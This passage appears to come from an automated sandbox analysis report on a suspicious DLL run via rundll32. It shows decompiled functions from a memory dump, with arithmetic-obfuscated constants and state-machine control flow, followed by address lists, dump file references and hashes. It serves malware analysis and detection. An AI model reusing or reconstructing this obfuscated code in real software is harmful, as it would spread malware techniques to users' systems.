                                                                        								_t378 = _t390;
                                                                        							} while (_t390 != 0);
                                                                        							_t321 = 0x5942909;
                                                                        						}
                                                                        						_t377 = _a4;
                                                                        						_t341 = 0x178c149f;
                                                                        					} else {
                                                                        						if(_t341 == 0x27600fdb) {
                                                                        							_t341 = 0x2d4988fb;
                                                                        							goto L2;
                                                                        						} else {
                                                                        							if(_t341 == 0x2d4988fb) {
                                                                        								E100142E2( &_v8, E10005EB9, _v20, _v88);
                                                                        								_t396 =  &(_t396[3]);
                                                                        								_t341 = 0xb31c45f;
                                                                        								continue;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					goto L29;
                                                                        				}
                                                                        			}



























































                                                                        0x00000000
                                                                        0x10012738
                                                                        0x1001274f
                                                                        0x10012755
                                                                        0x10012869
                                                                        0x1001287c
                                                                        0x10012881
                                                                        0x10012884
                                                                        0x10012886
                                                                        0x10012738
                                                                        0x10012738
                                                                        0x00000000
                                                                        0x10012738
                                                                        0x1001275b
                                                                        0x1001275d
                                                                        0x100127f0
                                                                        0x100127f4
                                                                        0x100127fd
                                                                        0x100127ff
                                                                        0x10012819
                                                                        0x10012831
                                                                        0x10012836
                                                                        0x10012839
                                                                        0x1001283d
                                                                        0x1001283e
                                                                        0x10012843
                                                                        0x10012844
                                                                        0x10012847
                                                                        0x1001284b
                                                                        0x1001284b
                                                                        0x10012850
                                                                        0x10012857
                                                                        0x00000000
                                                                        0x10012763
                                                                        0x10012769
                                                                        0x1001279c
                                                                        0x100127a0
                                                                        0x100127a7
                                                                        0x100127b0
                                                                        0x100127b2
                                                                        0x100127c2
                                                                        0x100127c7
                                                                        0x100127cc
                                                                        0x100127cf
                                                                        0x100127d3
                                                                        0x100127da
                                                                        0x100127da
                                                                        0x100127df
                                                                        0x100127e4
                                                                        0x100127e4
                                                                        0x00000000
                                                                        0x1001276b
                                                                        0x10012771
                                                                        0x1001277f
                                                                        0x10012788
                                                                        0x1001278a
                                                                        0x10012797
                                                                        0x00000000
                                                                        0x10012797
                                                                        0x10012771
                                                                        0x10012769
                                                                        0x1001275d
                                                                        0x10012755
                                                                        0x10012943
                                                                        0x10012950
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10012964
                                                                        0x10012964
                                                                        0x100128b9
                                                                        0x10012902
                                                                        0x1001290b
                                                                        0x1001290d
                                                                        0x10012911
                                                                        0x10012924
                                                                        0x10012929
                                                                        0x1001292c
                                                                        0x1001292e
                                                                        0x10012932
                                                                        0x10012932
                                                                        0x10012937
                                                                        0x1001293e
                                                                        0x100128bb
                                                                        0x100128c1
                                                                        0x100128f8
                                                                        0x00000000
                                                                        0x100128c3
                                                                        0x100128c9
                                                                        0x100128e6
                                                                        0x100128eb
                                                                        0x100128ee
                                                                        0x00000000
                                                                        0x100128ee
                                                                        0x100128c9
                                                                        0x100128c1
                                                                        0x00000000
                                                                        0x100128b9

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 5-$G!z$amH$n$o
                                                                        • API String ID: 0-2418732634
                                                                        • Opcode ID: 3887bab40c44b1641d7bbcfab6a6f4e19126a941134cafb96a2f4f2f1bff6032
                                                                        • Instruction ID: 6f407b80c570a864ccd2820a3afddbd72b69261bff4ce0457850b771c8ca1b73
                                                                        • Opcode Fuzzy Hash: 3887bab40c44b1641d7bbcfab6a6f4e19126a941134cafb96a2f4f2f1bff6032
                                                                        • Instruction Fuzzy Hash: 7DF141754083818FD368CF25C58664FBBE1FBC4758F60890DF29A9A260CB75D989CF82
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 95%
                                                                        			E1001C04C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                        				char _v52;
                                                                        				signed int _v56;
                                                                        				signed int _v60;
                                                                        				signed int _v64;
                                                                        				signed int _v68;
                                                                        				signed int _v72;
                                                                        				signed int _v76;
                                                                        				signed int _v80;
                                                                        				signed int _v84;
                                                                        				signed int _v88;
                                                                        				signed int _v92;
                                                                        				signed int _v96;
                                                                        				signed int _v100;
                                                                        				signed int _v104;
                                                                        				signed int _v108;
                                                                        				signed int _v112;
                                                                        				void* _t150;
                                                                        				void* _t174;
                                                                        				void* _t180;
                                                                        				signed int _t181;
                                                                        				signed int _t182;
                                                                        				signed int _t183;
                                                                        				signed int _t184;
                                                                        				signed int _t185;
                                                                        				signed int _t186;
                                                                        				void* _t189;
                                                                        				void* _t213;
                                                                        				void* _t214;
                                                                        				signed int* _t217;
                                                                        
                                                                        				_push(_a8);
                                                                        				_t213 = __ecx;
                                                                        				_push(_a4);
                                                                        				_push(__edx);
                                                                        				_push(__ecx);
                                                                        				E100056B2(_t150);
                                                                        				_v80 = 0xc784;
                                                                        				_t217 =  &(( &_v112)[4]);
                                                                        				_v80 = _v80 << 4;
                                                                        				_t214 = 0;
                                                                        				_t189 = 0x33fb58ad;
                                                                        				_t181 = 0x6b;
                                                                        				_v80 = _v80 * 0x28;
                                                                        				_v80 = _v80 ^ 0x01f2d8b7;
                                                                        				_v84 = 0x50fb;
                                                                        				_v84 = _v84 >> 0xf;
                                                                        				_v84 = _v84 + 0x937e;
                                                                        				_v84 = _v84 ^ 0x0000fdde;
                                                                        				_v56 = 0x327d;
                                                                        				_v56 = _v56 + 0xffffdcf3;
                                                                        				_v56 = _v56 ^ 0x00004b6f;
                                                                        				_v88 = 0x146d;
                                                                        				_v88 = _v88 ^ 0x8349746f;
                                                                        				_v88 = _v88 / _t181;
                                                                        				_v88 = _v88 ^ 0x013a5398;
                                                                        				_v60 = 0xe2fe;
                                                                        				_t182 = 0x25;
                                                                        				_v60 = _v60 * 0x79;
                                                                        				_v60 = _v60 ^ 0x006b2efa;
                                                                        				_v64 = 0xc02b;
                                                                        				_v64 = _v64 >> 3;
                                                                        				_v64 = _v64 ^ 0x00002cf4;
                                                                        				_v92 = 0x8680;
                                                                        				_v92 = _v92 * 0x7e;
                                                                        				_v92 = _v92 + 0xffff14d8;
                                                                        				_v92 = _v92 ^ 0x004119fe;
                                                                        				_v96 = 0x22ae;
                                                                        				_v96 = _v96 * 0x57;
                                                                        				_v96 = _v96 * 0x15;
                                                                        				_v96 = _v96 ^ 0x00f7010a;
                                                                        				_v68 = 0x9e2a;
                                                                        				_v68 = _v68 << 0xa;
                                                                        				_v68 = _v68 ^ 0x0278df5a;
                                                                        				_v100 = 0x70f1;
                                                                        				_v100 = _v100 + 0x9f07;
                                                                        				_v100 = _v100 << 7;
                                                                        				_v100 = _v100 ^ 0x0087eaa7;
                                                                        				_v72 = 0xae27;
                                                                        				_v72 = _v72 + 0xffff81b6;
                                                                        				_v72 = _v72 ^ 0x00001dbd;
                                                                        				_v76 = 0xeb69;
                                                                        				_v76 = _v76 + 0xe753;
                                                                        				_v76 = _v76 / _t182;
                                                                        				_v76 = _v76 ^ 0x00001cc5;
                                                                        				_v104 = 0x4553;
                                                                        				_v104 = _v104 + 0xffffebb9;
                                                                        				_t183 = 0x7e;
                                                                        				_v104 = _v104 / _t183;
                                                                        				_t184 = 0xe;
                                                                        				_v104 = _v104 / _t184;
                                                                        				_v104 = _v104 ^ 0x00003b66;
                                                                        				_v108 = 0x5045;
                                                                        				_t185 = 0x38;
                                                                        				_v108 = _v108 / _t185;
                                                                        				_t186 = 0x45;
                                                                        				_v108 = _v108 * 0x58;
                                                                        				_v108 = _v108 * 0x4a;
                                                                        				_v108 = _v108 ^ 0x002412f1;
                                                                        				_v112 = 0x2d31;
                                                                        				_v112 = _v112 / _t186;
                                                                        				_v112 = _v112 ^ 0x7267b250;
                                                                        				_v112 = _v112 + 0xd72;
                                                                        				_v112 = _v112 ^ 0x7267a792;
                                                                        				while(_t189 != 0x8879467) {
                                                                        					if(_t189 == 0x1932f021) {
                                                                        						_t174 = E1001D290(_v88, _v60, _v64, _t213, _v92,  &_v52);
                                                                        						_t217 =  &(_t217[4]);
                                                                        						__eflags = _t174;
                                                                        						if(__eflags != 0) {
                                                                        							_t189 = 0x36f0c2c4;
                                                                        							continue;
                                                                        						}
                                                                        					} else {
                                                                        						if(_t189 == 0x33be0ba1) {
                                                                        							_t147 = _t213 + 8; // 0x3ba4bc1b
                                                                        							__eflags = E10009899(_t147, _v76, __eflags,  &_v52, _v104, _v108, _v112);
                                                                        							_t214 =  !=  ? 1 : _t214;
                                                                        							__eflags = _t214;
                                                                        						} else {
                                                                        							if(_t189 == 0x33fb58ad) {
                                                                        								_t189 = 0x8879467;
                                                                        								continue;
                                                                        							} else {
                                                                        								if(_t189 != 0x36f0c2c4) {
                                                                        									L12:
                                                                        									__eflags = _t189 - 0x2249cb7b;
                                                                        									if(__eflags != 0) {
                                                                        										continue;
                                                                        									} else {
                                                                        									}
                                                                        								} else {
                                                                        									_t130 = _t213 + 4; // 0x3ba4bc17
                                                                        									_t180 = E1001D290(_v96, _v68, _v100, _t130, _v72,  &_v52);
                                                                        									_t217 =  &(_t217[4]);
                                                                        									if(_t180 != 0) {
                                                                        										_t189 = 0x33be0ba1;
                                                                        										continue;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					return _t214;
                                                                        				}
                                                                        				E1001F3E9(_v80, _v84, _v56, _a4,  &_v52);
                                                                        				_t217 =  &(_t217[3]);
                                                                        				_t189 = 0x1932f021;
                                                                        				goto L12;
                                                                        			}

                                                                        0x1001c284
                                                                        0x1001c28a
                                                                        0x1001c2c1
                                                                        0x00000000
                                                                        0x1001c28c
                                                                        0x1001c292
                                                                        0x1001c313
                                                                        0x1001c313
                                                                        0x1001c319
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c31f
                                                                        0x1001c294
                                                                        0x1001c29d
                                                                        0x1001c2ad
                                                                        0x1001c2b2
                                                                        0x1001c2b7
                                                                        0x1001c2bd
                                                                        0x00000000
                                                                        0x1001c2bd
                                                                        0x1001c2b7
                                                                        0x1001c292
                                                                        0x1001c28a
                                                                        0x1001c27e
                                                                        0x1001c352
                                                                        0x1001c352
                                                                        0x1001c306
                                                                        0x1001c30b
                                                                        0x1001c30e
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: EP$S$f;$oK$r
                                                                        • API String ID: 0-800867564
                                                                        • Opcode ID: 720cd8e89fa945350f7bf224007334e3e1789cc6eb53dad625d3cb73989cf900
                                                                        • Instruction ID: d204fd09f4313df74329eeb12e1bf2a89ad17ecc6e86b591d2f7d2102d956d92
                                                                        • Opcode Fuzzy Hash: 720cd8e89fa945350f7bf224007334e3e1789cc6eb53dad625d3cb73989cf900
                                                                        • Instruction Fuzzy Hash: BB8152715083419FE354CF65C88581FBBF5FBC9348F50891EF5998A2A0D3B6CA898B42
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 88%
                                                                        			E1001CDCC(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a24) {
                                                                        				signed int _v4;
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				signed int _v40;
                                                                        				signed int _v44;
                                                                        				signed int _v48;
                                                                        				signed int _v52;
                                                                        				signed int _v56;
                                                                        				void* _t139;
                                                                        				signed int _t152;
                                                                        				void* _t157;
                                                                        				signed int _t171;
                                                                        				signed int _t172;
                                                                        				signed int _t173;
                                                                        				void* _t175;
                                                                        				signed int* _t178;
                                                                        
                                                                        				_push(_a24);
                                                                        				_push(0xffffffff);
                                                                        				_push(_a16);
                                                                        				_push(0);
                                                                        				_push(_a8);
                                                                        				_push(_a4);
                                                                        				_push(__edx);
                                                                        				_push(__ecx);
                                                                        				E100056B2(_t139);
                                                                        				_v28 = 0x325f;
                                                                        				_t178 =  &(( &_v56)[8]);
                                                                        				_v28 = _v28 + 0xffff4d87;
                                                                        				_v28 = _v28 + 0xffff7eee;
                                                                        				_t175 = 0;
                                                                        				_v28 = _v28 ^ 0xfffeea83;
                                                                        				_t157 = 0x2e625de7;
                                                                        				_v16 = 0x7ea1;
                                                                        				_t171 = 0x4c;
                                                                        				_v16 = _v16 * 0x50;
                                                                        				_v16 = _v16 ^ 0x0027b5c0;
                                                                        				_v48 = 0xb396;
                                                                        				_v48 = _v48 << 2;
                                                                        				_v48 = _v48 + 0xffffd4e6;
                                                                        				_v48 = _v48 * 0x23;
                                                                        				_v48 = _v48 ^ 0x005c32d3;
                                                                        				_v52 = 0x4c8e;
                                                                        				_v52 = _v52 >> 4;
                                                                        				_v52 = _v52 + 0xffff8362;
                                                                        				_v52 = _v52 | 0xaf524c7b;
                                                                        				_v52 = _v52 ^ 0xffffb92c;
                                                                        				_v20 = 0xd7f5;
                                                                        				_v20 = _v20 | 0xc3990154;
                                                                        				_v20 = _v20 ^ 0xc3999ac5;
                                                                        				_v56 = 0x9c91;
                                                                        				_v56 = _v56 | 0x8c86dbc7;
                                                                        				_v56 = _v56 + 0xf56e;
                                                                        				_v56 = _v56 ^ 0x560a30e6;
                                                                        				_v56 = _v56 ^ 0xda8da389;
                                                                        				_v12 = 0xdf7a;
                                                                        				_v12 = _v12 << 1;
                                                                        				_v12 = _v12 ^ 0x0001eefc;
                                                                        				_v24 = 0x3c6;
                                                                        				_v24 = _v24 | 0x5cdca8ce;
                                                                        				_v24 = _v24 + 0x7ec4;
                                                                        				_v24 = _v24 ^ 0x5cdd52aa;
                                                                        				_v4 = 0xc884;
                                                                        				_v4 = _v4 | 0x864be180;
                                                                        				_v4 = _v4 ^ 0x864b8e34;
                                                                        				_v32 = 0xecf0;
                                                                        				_v32 = _v32 / _t171;
                                                                        				_v32 = _v32 >> 0xf;
                                                                        				_v32 = _v32 << 0xc;
                                                                        				_v32 = _v32 ^ 0x00000683;
                                                                        				_v8 = 0xa81d;
                                                                        				_v8 = _v8 << 0xb;
                                                                        				_v8 = _v8 ^ 0x05408dca;
                                                                        				_v36 = 0x9864;
                                                                        				_t172 = 0x59;
                                                                        				_v36 = _v36 / _t172;
                                                                        				_v36 = _v36 ^ 0xaaa5894b;
                                                                        				_v36 = _v36 + 0xffff7394;
                                                                        				_v36 = _v36 ^ 0xaaa4dea0;
                                                                        				_v40 = 0xd8eb;
                                                                        				_v40 = _v40 + 0x511b;
                                                                        				_v40 = _v40 >> 3;
                                                                        				_v40 = _v40 + 0xffff6e25;
                                                                        				_v40 = _v40 ^ 0xffffcd83;
                                                                        				_v44 = 0x92f;
                                                                        				_v44 = _v44 ^ 0xfb5f1719;
                                                                        				_v44 = _v44 << 3;
                                                                        				_t173 = 0x32;
                                                                        				_t174 = _v4;
                                                                        				_v44 = _v44 / _t173;
                                                                        				_v44 = _v44 ^ 0x0461405b;
                                                                        				do {
                                                                        					while(_t157 != 0xc7aef4e) {
                                                                        						if(_t157 == 0x1f37240b) {
                                                                        							_t152 = E1000CF11(0, _a16, _v28, 0xffffffff, _v16, _t157, _v48, 0, _v52, _a8, _v20, _v56);
                                                                        							_t174 = _t152;
                                                                        							_t178 =  &(_t178[0xa]);
                                                                        							if(_t152 != 0) {
                                                                        								_t157 = 0xc7aef4e;
                                                                        								continue;
                                                                        							}
                                                                        						} else {
                                                                        							if(_t157 == 0x2e625de7) {
                                                                        								_t157 = 0x1f37240b;
                                                                        								continue;
                                                                        							} else {
                                                                        								if(_t157 != 0x32a206ac) {
                                                                        									goto L13;
                                                                        								} else {
                                                                        									E1000CF11(_t174, _a16, _v4, 0xffffffff, _v32, _t157, _v8, _t175, _v36, _a8, _v40, _v44);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						L6:
                                                                        						return _t175;
                                                                        					}
                                                                        					_push(_t157);
                                                                        					_t175 = E100157E8(_t174 + _t174);
                                                                        					if(_t175 == 0) {
                                                                        						_t157 = 0x3ab8f213;
                                                                        						goto L13;
                                                                        					} else {
                                                                        						_t157 = 0x32a206ac;
                                                                        						continue;
                                                                        					}
                                                                        					goto L6;
                                                                        					L13:
                                                                        				} while (_t157 != 0x3ab8f213);
                                                                        				goto L6;
                                                                        			}


























                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: /$_2$0V$]b.$]b.
                                                                        • API String ID: 0-2210830570
                                                                        • Opcode ID: bb31032d2e2ee86c7c0b69b262f4d6c603d272611a24b6ff2f3b23f068030bec
                                                                        • Instruction ID: 48653eb64770e08f90b0effd2631becc7befea07c136a9e8f7f8472ce2e08f8d
                                                                        • Opcode Fuzzy Hash: bb31032d2e2ee86c7c0b69b262f4d6c603d272611a24b6ff2f3b23f068030bec
                                                                        • Instruction Fuzzy Hash: CD71447150D3429FD358CF61C84991FBBE2FBC8758F104A1DF5965A2A0C3B5CA4A8F86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10017570(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				signed int _v40;
                                                                        				signed int _v44;
                                                                        				signed int _v48;
                                                                        				signed int _v52;
                                                                        				signed int _v56;
                                                                        				signed int _v60;
                                                                        				signed int _v64;
                                                                        				char _v584;
                                                                        				void* _t176;
                                                                        				signed int _t183;
                                                                        				signed int _t184;
                                                                        				signed int _t185;
                                                                        				signed int _t186;
                                                                        				signed int _t187;
                                                                        				signed int _t188;
                                                                        				signed int _t189;
                                                                        
                                                                        				_v20 = 0x17f2;
                                                                        				_t183 = 0x21;
                                                                        				_v20 = _v20 / _t183;
                                                                        				_v20 = _v20 + 0x6d93;
                                                                        				_v20 = _v20 ^ 0xb3130aa6;
                                                                        				_v20 = _v20 ^ 0xb31362a2;
                                                                        				_v44 = 0x7846;
                                                                        				_t184 = 0x2b;
                                                                        				_v44 = _v44 / _t184;
                                                                        				_v44 = _v44 | 0x2d637405;
                                                                        				_v44 = _v44 ^ 0x2d633d3a;
                                                                        				_v12 = 0x826a;
                                                                        				_v12 = _v12 >> 6;
                                                                        				_v12 = _v12 << 0xf;
                                                                        				_v12 = _v12 + 0xfdce;
                                                                        				_v12 = _v12 ^ 0x01053037;
                                                                        				_v40 = 0xb008;
                                                                        				_t185 = 9;
                                                                        				_v40 = _v40 / _t185;
                                                                        				_v40 = _v40 | 0xdff8508a;
                                                                        				_v40 = _v40 ^ 0xdff82a49;
                                                                        				_v16 = 0x97c9;
                                                                        				_v16 = _v16 >> 6;
                                                                        				_v16 = _v16 << 0xd;
                                                                        				_t186 = 0x13;
                                                                        				_v16 = _v16 / _t186;
                                                                        				_v16 = _v16 ^ 0x0003c223;
                                                                        				_v52 = 0xe117;
                                                                        				_v52 = _v52 + 0xb465;
                                                                        				_v52 = _v52 << 7;
                                                                        				_v52 = _v52 ^ 0x00cab1cc;
                                                                        				_v8 = 0x7d37;
                                                                        				_v8 = _v8 ^ 0x8829a720;
                                                                        				_v8 = _v8 << 0xa;
                                                                        				_t187 = 0x5d;
                                                                        				_v8 = _v8 * 0x3b;
                                                                        				_v8 = _v8 ^ 0x950d599f;
                                                                        				_v28 = 0xafcc;
                                                                        				_v28 = _v28 / _t187;
                                                                        				_v28 = _v28 << 1;
                                                                        				_v28 = _v28 ^ 0x00004226;
                                                                        				_v56 = 0x4900;
                                                                        				_v56 = _v56 | 0xacb64693;
                                                                        				_v56 = _v56 ^ 0xacb6052b;
                                                                        				_v24 = 0xef8a;
                                                                        				_v24 = _v24 + 0xf857;
                                                                        				_v24 = _v24 ^ 0xfd20d672;
                                                                        				_v24 = _v24 * 0x1d;
                                                                        				_v24 = _v24 ^ 0xacc29ce3;
                                                                        				_v48 = 0xd87;
                                                                        				_v48 = _v48 | 0xb3f54364;
                                                                        				_v48 = _v48 + 0xffff5c7b;
                                                                        				_v48 = _v48 ^ 0xb3f4bccb;
                                                                        				_v60 = 0x28ae;
                                                                        				_v60 = _v60 + 0xfffff49f;
                                                                        				_v60 = _v60 ^ 0x000001f3;
                                                                        				_v36 = 0xf8cf;
                                                                        				_v36 = _v36 ^ 0x7fa8aefd;
                                                                        				_v36 = _v36 + 0xffff1020;
                                                                        				_v36 = _v36 ^ 0x7fa70865;
                                                                        				_v32 = 0x4e50;
                                                                        				_t188 = 0xf;
                                                                        				_v32 = _v32 * 0x79;
                                                                        				_t189 = 6;
                                                                        				_v32 = _v32 / _t188;
                                                                        				_v32 = _v32 ^ 0x0002677d;
                                                                        				_v64 = 0x2ab7;
                                                                        				_v64 = _v64 / _t189;
                                                                        				_v64 = _v64 ^ 0x00007a29;
                                                                        				_t176 = E10001E13(_v20, _v44, _v12, _v40,  *0x100221b0 + 0x10);
                                                                        				_t213 = _a4 + 0x2c;
                                                                        				if(E1000D867(_a4 + 0x2c, _v16, _t176, _v52, _v8, _v28) != 0) {
                                                                        					E1001DEE8(_v56,  &_v584, _v24, _t213, _a8, _v48);
                                                                        					E10003CA0(_v60, _v36, _v32,  &_v584, _v64);
                                                                        				}
                                                                        				return 1;
                                                                        			}




























                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrcmpi
                                                                        • String ID: &B$)z$7}$:=c-$PN
                                                                        • API String ID: 1586166983-136981183
                                                                        • Opcode ID: c149a1545c5a6f83b4e93e0c549a75000216febd44645262f1429a9ff698bb76
                                                                        • Instruction ID: 4c0853177137f9260245fdea803910a11f1a139b5b3783921c9f25fd3a1c4bd4
                                                                        • Opcode Fuzzy Hash: c149a1545c5a6f83b4e93e0c549a75000216febd44645262f1429a9ff698bb76
                                                                        • Instruction Fuzzy Hash: 59611471D0020EEBEF48CFE5D98A9EEBBB2FB44314F208059E411B6290D7B95A45CF94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 88%
                                                                        			E1000C6EF(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                        				signed int _v4;
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				signed int _v40;
                                                                        				signed int _v44;
                                                                        				signed int _v48;
                                                                        				void* _t105;
                                                                        				intOrPtr* _t118;
                                                                        				void* _t120;
                                                                        				void* _t128;
                                                                        				signed int _t129;
                                                                        				signed int _t130;
                                                                        				void* _t131;
                                                                        				signed int* _t133;
                                                                        
                                                                        				_push(_a20);
                                                                        				_t131 = __edx;
                                                                        				_t118 = __ecx;
                                                                        				_push(_a16);
                                                                        				_push(_a12);
                                                                        				_push(_a8);
                                                                        				_push(_a4);
                                                                        				_push(__edx);
                                                                        				_push(__ecx);
                                                                        				E100056B2(_t105);
                                                                        				_v32 = 0x6ec3;
                                                                        				_t133 =  &(( &_v48)[7]);
                                                                        				_v32 = _v32 << 2;
                                                                        				_v32 = _v32 >> 0xd;
                                                                        				_t128 = 0;
                                                                        				_v32 = _v32 ^ 0x00000124;
                                                                        				_t120 = 0x2e625de7;
                                                                        				_v20 = 0xd76a;
                                                                        				_t129 = 5;
                                                                        				_v20 = _v20 / _t129;
                                                                        				_v20 = _v20 ^ 0x000055da;
                                                                        				_v48 = 0x58a7;
                                                                        				_v48 = _v48 + 0x6c8;
                                                                        				_v48 = _v48 << 0xb;
                                                                        				_v48 = _v48 << 9;
                                                                        				_v48 = _v48 ^ 0xf6f0317b;
                                                                        				_v36 = 0x5d19;
                                                                        				_v36 = _v36 * 0x6c;
                                                                        				_v36 = _v36 + 0xb738;
                                                                        				_v36 = _v36 ^ 0x0027d757;
                                                                        				_v24 = 0x73a3;
                                                                        				_v24 = _v24 + 0x4f0f;
                                                                        				_v24 = _v24 ^ 0x0000ed3d;
                                                                        				_v44 = 0x403e;
                                                                        				_v44 = _v44 ^ 0xd0448639;
                                                                        				_v44 = _v44 + 0xffffdeb2;
                                                                        				_v44 = _v44 << 4;
                                                                        				_v44 = _v44 ^ 0x044a6664;
                                                                        				_v16 = 0x1c10;
                                                                        				_v16 = _v16 * 0x51;
                                                                        				_v16 = _v16 ^ 0x0008f1ff;
                                                                        				_v4 = 0x63b7;
                                                                        				_v4 = _v4 << 0x10;
                                                                        				_v4 = _v4 ^ 0x63b7360b;
                                                                        				_v28 = 0x3e7f;
                                                                        				_v28 = _v28 ^ 0x7d4cf8f0;
                                                                        				_t130 = _v4;
                                                                        				_v28 = _v28 * 0x2c;
                                                                        				_v28 = _v28 ^ 0x89322d32;
                                                                        				_v40 = 0xdd6b;
                                                                        				_v40 = _v40 + 0xfc8c;
                                                                        				_v40 = _v40 >> 0x10;
                                                                        				_v40 = _v40 << 9;
                                                                        				_v40 = _v40 ^ 0x0000558e;
                                                                        				_v8 = 0x49f9;
                                                                        				_v8 = _v8 + 0xfffff29f;
                                                                        				_v8 = _v8 ^ 0x00000d42;
                                                                        				_v12 = 0x318;
                                                                        				_v12 = _v12 >> 0xc;
                                                                        				_v12 = _v12 ^ 0x0000321b;
                                                                        				do {
                                                                        					while(_t120 != 0xc7aef4e) {
                                                                        						if(_t120 == 0x1f37240b) {
                                                                        							_t130 = E10009A00(_v32, _t120, 0, _v20, _a16, 0, _a12, _v48, _t120, _v36, _v24, _t131);
                                                                        							_t133 =  &(_t133[0xb]);
                                                                        							if(_t130 == 0) {
                                                                        								L7:
                                                                        								return _t128;
                                                                        							}
                                                                        							_t120 = 0xc7aef4e;
                                                                        							continue;
                                                                        						}
                                                                        						if(_t120 == 0x2e625de7) {
                                                                        							_t120 = 0x1f37240b;
                                                                        							continue;
                                                                        						}
                                                                        						if(_t120 != 0x32a206ac) {
                                                                        							goto L14;
                                                                        						}
                                                                        						E10009A00(_v4, _t120, _t128, _v28, _a16, _t130, _a12, _v40, _t120, _v8, _v12, _t131);
                                                                        						if(_t118 != 0) {
                                                                        							 *_t118 = _t130;
                                                                        						}
                                                                        						goto L7;
                                                                        					}
                                                                        					_push(_t120);
                                                                        					_t128 = E100157E8(_t130);
                                                                        					if(_t128 == 0) {
                                                                        						_t120 = 0x3ab8f213;
                                                                        						goto L14;
                                                                        					}
                                                                        					_t120 = 0x32a206ac;
                                                                        					continue;
                                                                        					L14:
                                                                        				} while (_t120 != 0x3ab8f213);
                                                                        				goto L7;
                                                                        			}























                                                                        0x1000c85d
                                                                        0x1000c865
                                                                        0x1000c86d
                                                                        0x1000c872
                                                                        0x1000c87a
                                                                        0x1000c87a
                                                                        0x1000c88c
                                                                        0x1000c90a
                                                                        0x1000c90c
                                                                        0x1000c911
                                                                        0x1000c8d1
                                                                        0x1000c8da
                                                                        0x1000c8da
                                                                        0x1000c913
                                                                        0x00000000
                                                                        0x1000c913
                                                                        0x1000c894
                                                                        0x1000c8db
                                                                        0x00000000
                                                                        0x1000c8db
                                                                        0x1000c89c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000c8c3
                                                                        0x1000c8cd
                                                                        0x1000c8cf
                                                                        0x1000c8cf
                                                                        0x00000000
                                                                        0x1000c8cd
                                                                        0x1000c925
                                                                        0x1000c92d
                                                                        0x1000c932
                                                                        0x1000c93e
                                                                        0x00000000
                                                                        0x1000c93e
                                                                        0x1000c934
                                                                        0x00000000
                                                                        0x1000c943
                                                                        0x1000c943
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
